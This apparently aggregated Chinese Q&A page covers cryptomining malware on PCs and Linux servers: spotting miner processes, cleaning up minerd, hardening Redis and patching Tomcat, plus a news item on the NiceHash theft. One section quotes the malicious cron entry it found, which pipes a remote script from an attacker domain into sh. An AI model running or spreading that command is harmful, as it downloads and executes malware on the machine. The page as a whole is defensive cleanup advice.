入侵事件挖礦進程

㈠ 如何查看電腦是否被植入了挖礦程序

如何判斷自己的電腦是否被挖礦，怎樣預防？
電腦開機後，所有程序都不打開的情況下。按Ctrl+ALT+Del調出任務管理器，在「進程」卡項中，查看CPU的使用情況。如果看到某個進程佔用了大量的cpu使用情況，並且幾分鍾後都沒有降低的趨勢，這個程序就可能是病毒了。
想要預防自己的電腦被挖礦也很簡單，只要安裝正規的安全軟體，使用安全的瀏覽器，添加安全合適的插件，就可以防止電腦被挖礦了。
當然，如果不瀏覽不正規不健康的網站，不下載盜版游戲，盜版軟體等就更能從根源杜絕電腦被不法分子挖礦的風險。

㈡ 求助伺服器被挖礦程序入侵，如何排查

新客戶於最近向我們SINE安全公司咨詢，說他的伺服器經常卡的網站無法打開，遠程連接

伺服器的慢的要命，有時候PING值都達到300-500之間，還經常掉包，聽客戶這么一說，一般

會判斷為受到了CC+DDOS混合流量攻擊，再具體一問，說是機房那面沒有受到流量攻擊，這

就有點奇怪了，不是流量攻擊，還導致伺服器卡，網站無法打開，這是什麼攻擊？為了解決客

戶伺服器卡的問題，我們隨即安排安全工程師對他的Linux伺服器進行了安全檢測與安全部署。

挖礦木馬還設計了挖礦進程如果被客戶強制停止後，會自動啟動繼續挖礦，達到不間斷的挖礦，

仔細檢查發現是通過設置了每個小時執行任務計劃，遠程下載shell挖礦木馬，然後執行，檢查

當前進程是否存在，不存在就啟動挖礦木馬，進行挖礦。

對客戶的linux伺服器進行詳細了安全檢測發現幸虧沒有加密伺服器的數據，以及感染蠕蟲的病

毒，如果數據被加密那損失大了，客戶是做平台的，裡面的客戶數據很重要，找出挖礦木馬後，

客戶需要知道伺服器到底是如何被攻擊的？ 被上傳挖礦木馬的？ 防止後期再出現這樣的攻擊

狀況。

通過我們安全工程師的安全檢測與分析，發現該伺服器使用的是apache tomcat環境，平台的開

發架構是JSP+oracle資料庫，apache tomcat使用的是2016年的版本，導致該apache存在嚴重

的遠程執行命令漏洞，入侵者可以通過該漏洞直接入侵伺服器，拿到伺服器的管理員許可權，

SINE安全工程師立即對apache 漏洞進行修復，並清除木馬，至此問題得以解決，客戶伺服器

一切穩定運行，網站打開正常。

㈢ 請教大神，伺服器被挖礦程序入侵如何排插

重裝系統，並做好安全加固是最好的辦法。
如果非要排查，也簡單，你看系統進程，是否有不常見的就知道了。
不過自己處理安全，一般都無法徹底，建議還是找專業安全公司（如護衛神）好些。

㈣ Linux系統被Carbon挖礦病毒入侵，殺掉之後過一段時間又起來了，有誰遇到過這種情況啊

這種病毒騰訊安全提到過
可以去下載安裝一個騰訊御點
打開之後，使用裡面的病毒查殺功能，直接就可以查殺這種電腦病毒了

㈤ tasklsv.exe挖礦病毒如何徹底清除

請勿訪問陌生網站，在陌生網站瀏覽、下載很可能導致中毒。

1. 若電腦中存在木馬或者病毒程序，安裝一款安全軟體（例如：電腦管家等）。使用安全軟體進行掃描全盤即可發現病毒並刪除。若無法處理或者出現錯誤請嘗試備份重要資料後重新安裝系統。

2. 若手機中存在木馬或者病毒程序，安裝一款安全軟體（例如：手機管家等）。以手機管家為例，打開手機管家，點擊主界面上的一鍵體檢即可自動檢測手機中存在的病毒，點擊一鍵清除即可刪除。

㈥ 阿里雲伺服器被挖礦了怎麼辦(純純電腦小白

1. 關閉訪問挖礦伺服器的訪問

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP and iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP.

2. chmod -x minerd ,取消掉執行許可權， 在沒有找到根源前，千萬不要刪除 minerd，因為刪除了，過一回會自動有生成一個。

3. pkill minerd ,殺掉進程

4. service stop crond 或者 crontab -r 刪除所有的執行計劃

5. 執行top，查看了一會，沒有再發現minerd 進程了。

6.檢查/var/spool/cron/目錄下發現有個root用戶的定時器文件。

下載腳本的語句：

*/5 * * * * curl -fsSL http://www.haveabitchin.com/pm.sh?0105010 | sh
病毒文件內容如下，感興趣的可以研究下：

View Code

解決minerd並不是最終的目的，主要是要查找問題根源，我的伺服器問題出在了redis服務了，黑客利用了redis的一個漏洞獲得了伺服器的訪問許可權，http://blog.jobbole.com/94518/然後就注入了病毒，下面是解決辦法和清除工作：

1. 修復 redis 的後門,

配置bind選項, 限定可以連接Redis伺服器的IP, 並修改redis的默認埠6379.
配置AUTH, 設置密碼, 密碼會以明文方式保存在redis配置文件中.
配置rename-command CONFIG 「RENAME_CONFIG」, 這樣即使存在未授權訪問, 也能夠給攻擊者使用config指令加大難度
好消息是Redis作者表示將會開發」real user」，區分普通用戶和admin許可權，普通用戶將會被禁止運行某些命令，如conf
2. 打開 ~/.ssh/authorized_keys, 刪除你不認識的賬號

3. 查看你的用戶列表，是不是有你不認識的用戶添加進來。 如果有就刪除掉.

㈦ 我的阿里雲騎士報挖礦進程啥意思

中毒了，被黑客奪取了控制許可權，然後用你的機器幫黑客賺錢

㈧ 比特幣挖礦平台被入侵情形如何

斯洛維尼亞挖礦平台NiceHash周四在其官網發布一則聲明，聲稱該平台遭遇黑客攻擊，大量比特幣被盜，目前平台各項服務已全面關閉。

NiceHash方面表示比特幣被盜是因為錢包遭遇入侵，公司正在核實被盜的比特幣數量，並配合有關部門進行調查。根據存儲比特幣錢包的地址顯示，此次約有4700多枚比特幣被盜。

卡巴斯基實驗室的惡意軟體分析師Sergey Yunakovsky認為，加密貨幣不再是一個遙不可及的技術。最近，我們觀察到針對不同類型的加密貨幣的惡意軟體攻擊有所增加，我們預計這一趨勢將繼續下去。

而加密貨幣價格的飆漲是它們被黑客盯上的主要原因。比特幣在本周上演瘋狂上漲的行情，隨著本周六美國市場比特幣期貨推出的臨近，市場對比特幣的狂熱在周四達到新高潮，該數字貨幣價格在約40個小時內飆升了約40%，連續突破五個千元關口，升破17000美元。周四，一些交易所的比特幣價格甚至一度升破19000美元，24小時內漲幅超50%。